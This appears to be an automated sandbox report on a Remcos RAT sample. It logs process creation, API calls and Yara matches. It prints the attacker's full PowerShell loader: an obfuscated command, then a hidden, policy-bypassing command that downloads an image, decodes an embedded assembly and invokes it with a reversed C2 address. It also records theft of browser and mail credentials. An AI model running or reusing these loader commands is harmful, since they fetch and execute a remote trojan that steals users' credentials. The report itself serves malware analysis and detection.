                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ibmyilijkzqgggcoxzdgfu"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kvsjjdtlyhiliuyshkqzizcqbm"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\uxxbkweempbqtbmwyvcbtlxzcbqib"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dy? ? ? ? ?m? ? ? ? ?? ? ? ? ?x? ? ? ? ?dc? ? ? ? ?m? ? ? ? ?? ? ? ? ?2? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?v? ? ? ? ?gk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?g4? ? ? ? ?zqb3? ? ? ? ?f8? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?f8? ? ? ? ?mg? ? ? ? ?w? ? ? ? ?di? ? ? ? ?n? ? ? ? ?? ? ? ? ?w? ? ? ? ?dk? ? ? ? ?m? ? ? ? ?? ? ? ? ?1? ? ? ? ?c8? ? ? ? ?bgbl? ? ? ? ?hc? ? ? ? ?xwbp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?lgbq? ? ? ? ?h? ? ? ? ?? ? ? ? ?zw? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?bo? ? ? ? ?gu? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?e8? ? ? ? ?ygbq? ? ? ? ?gu? ? ? ? ?ywb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbo? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?fc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cq? ? ? ? ?dwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?lgbe? ? ? ? ?g8? ? ? ? ?dwbu? ? ? ? ?gw? ? ? ? ?bwbh? ? ? ? ?gq? ? ? ? ?r? ? ? ? ?bh? ? ? ? ?hq? ? ? ? ?yq? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fu? ? ? ? ?cgbs? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbu? ? ? ? ?gu? ? ? ? ?e? ? ? ? ?b0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?fs? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbu? ? ? ? ?gu? ? ? ? ?e? ? ? ? ?b0? ? ? ? ?c4? ? ? ? ?rqbu? ? ? ? ?gm? ? ? ? ?bwbk? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?f0? ? ? ? ?og? ? ? ? ?6? ? ? ? ?fu? ? ? ? ?v? ? ? ? ?bg? ? ? ? ?dg? ? ? ? ?lgbh? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?bt? ? ? ? ?hq? ? ? ? ?cgbp? ? ? ? ?g4? ? ? ? ?zw? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?ei? ? ? ? ?eqb0? ? ? ? ?gu? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bz? ? ? ? ?hq? ? ? ? ?yqby? ? ? ? ?hq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?dy? ? ? ? ?n? ? ? ? ?bf? ? ? ? ?fm? ? ? ? ?v? ? ? ? ?bb? ? ? ? ?fi? ? ? ? ?v? ? ? ? ?? ? ? ? ?+? ? ? ? ?d4? ? ? ? ?jw? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?zqbu? ? ? ? ?gq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?d
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.chmr/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dy? ? ? ? ?m? ? ? ? ?? ? ? ? ?x? ? ? ? ?dc? ? ? ? ?m? ? ? ? ?? ? ? ? ?2? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?v? ? ? ? ?gk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?g4? ? ? ? ?zqb3? ? ? ? ?f8? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?f8? ? ? ? ?mg? ? ? ? ?w? ? ? ? ?di? ? ? ? ?n? ? ? ? ?? ? ? ? ?w? ? ? ? ?dk? ? ? ? ?m? ? ? ? ?? ? ? ? ?1? ? ? ? ?c8? ? ? ? ?bgbl? ? ? ? ?hc? ? ? ? ?xwbp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?lgbq? ? ? ? ?h? ? ? ? ?? ? ? ? ?zw? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?bo? ? ? ? ?gu? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?e8? ? ? ? ?ygbq? ? ? ? ?gu? ? ? ? ?ywb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbo? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?fc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cq? ? ? ? ?dwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?lgbe? ? ? ? ?g8? ? ? ? ?dwbu? ? ? ? ?gw? ? ? ? ?bwbh? ? ? ? ?gq? ? ? ? ?r? ? ? ? ?bh? ? ? ? ?hq? ? ? ? ?yq? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fu? ? ? ? ?cgbs? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbu? ? ? ? ?gu? ? ? ? ?e? ? ? ? ?b0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?fs? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbu? ? ? ? ?gu? ? ? ? ?e? ? ? ? ?b0? ? ? ? ?c4? ? ? ? ?rqbu? ? ? ? ?gm? ? ? ? ?bwbk? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?f0? ? ? ? ?og? ? ? ? ?6? ? ? ? ?fu? ? ? ? ?v? ? ? ? ?bg? ? ? ? ?dg? ? ? ? ?lgbh? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?bt? ? ? ? ?hq? ? ? ? ?cgbp? ? ? ? ?g4? ? ? ? ?zw? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?ei? ? ? ? ?eqb0? ? ? ? ?gu? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bz? ? ? ? ?hq? ? ? ? ?yqby? ? ? ? ?hq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?dy? ? ? ? ?n? ? ? ? ?bf? ? ? ? ?fm? ? ? ? ?v? ? ? ? ?bb? ? ? ? ?fi? ? ? ? ?v? ? ? ? ?? ? ? ? ?+? ? ? ? ?d4? ? ? ? ?jw? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?zqbu? ? ? ? ?gq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?dJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.chmr/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"Jump to behavior
                    Source: RegAsm.exe, 0000000C.00000002.911284833.00000000006F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00434CB6 cpuid 12_2_00434CB6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,12_2_0045201B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,12_2_004520B6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_00452143
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,12_2_00452393
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,12_2_00448484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_004524BC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,12_2_004525C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_00452690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,12_2_0044896D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,12_2_0040F90C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,12_2_00451D58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,12_2_00451FD0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041B890 GetSystemTimes,Sleep,GetSystemTimes,__aulldiv,12_2_0041B890
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041B69E GetComputerNameExW,GetUserNameW,12_2_0041B69E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_00449210
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041739B GetVersionExW,13_2_0041739B
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.powershell.exe.41ceb20.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.powershell.exe.41ceb20.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.911284833.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.911284833.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.394834348.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3884, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3988, type: MEMORYSTR
                    Contains functionality to steal Chrome passwords or cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data12_2_0040BA4D
                    Contains functionality to steal Firefox passwords or cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\12_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db12_2_0040BB6B
                    Searches for Windows Mail specific files
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccountJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *Jump to behavior
